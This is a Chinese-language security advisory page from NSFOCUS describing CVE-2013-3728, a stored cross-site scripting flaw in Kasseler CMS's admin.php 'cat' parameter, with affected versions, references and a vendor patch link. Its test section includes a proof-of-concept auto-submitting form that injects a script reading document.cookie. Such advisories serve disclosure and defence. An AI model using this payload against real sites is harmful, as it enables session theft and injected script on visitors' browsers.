安全研究
安全漏洞
安全漏洞
所有系统
AIX
BSD(eg,OpenBSD)
Digital Unix
HP-UX
IRIX
Linux
FreeBSD
SCO UNIX
SunOS
Solaris
Windows
所有类型
远程进入系统
本地越权访问
拒绝服务攻击
嵌入恶意代码
Web数据接口
其他类型
Kasseler CMS 'admin.php' HTML注入漏洞
发布日期:
2013-07-03
更新日期:
2013-07-04
受影响系统:
Kasseler CMS Kasseler CMS <= 2 r1223
描述:
BUGTRAQ ID:
60927
CVE(CAN) ID:
CVE-2013-3728
Kasseler CMS是内容管理系统。
Kasseler CMS 2 r1223存在存储型跨站脚本漏洞,此漏洞源于"/admin.php"脚本内的"cat" HTTP POST参数缺少足够的过滤。远程攻击者如果可以创建目录,则可以注入任意HTML和脚本代码到应用数据库内,并在每个站点浏览者浏览器中执行。
<*来源:High-Tech Bridge Security Research Lab
链接:
https://www.htbridge.com/advisory/HTB23158
http://seclists.org/bugtraq/2013/Jul/26
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
&lt;form action="
http://www.example.com/admin.php?module=forum&amp;do=admin_new_category
" method="post" name="main"&gt;
&lt;input type="hidden" name="cat" value="&lt;script&gt;alert(document.cookie);&lt;/script&gt;"&gt;
&lt;input type="submit" id="btn"&gt;
&lt;/form&gt;
&lt;script&gt;
document.main.submit();
&lt;/script&gt;
建议:
厂商补丁:
Kasseler CMS
------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://diff.kasseler-cms.net/svn/patches/1232.html
浏览次数:
4765
严重程度:
0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障
关于我们
公司介绍
公司荣誉
公司新闻
联系我们
公司总部
分支机构
海外机构
快速链接
绿盟云
绿盟威胁情报中心NTI
技术博客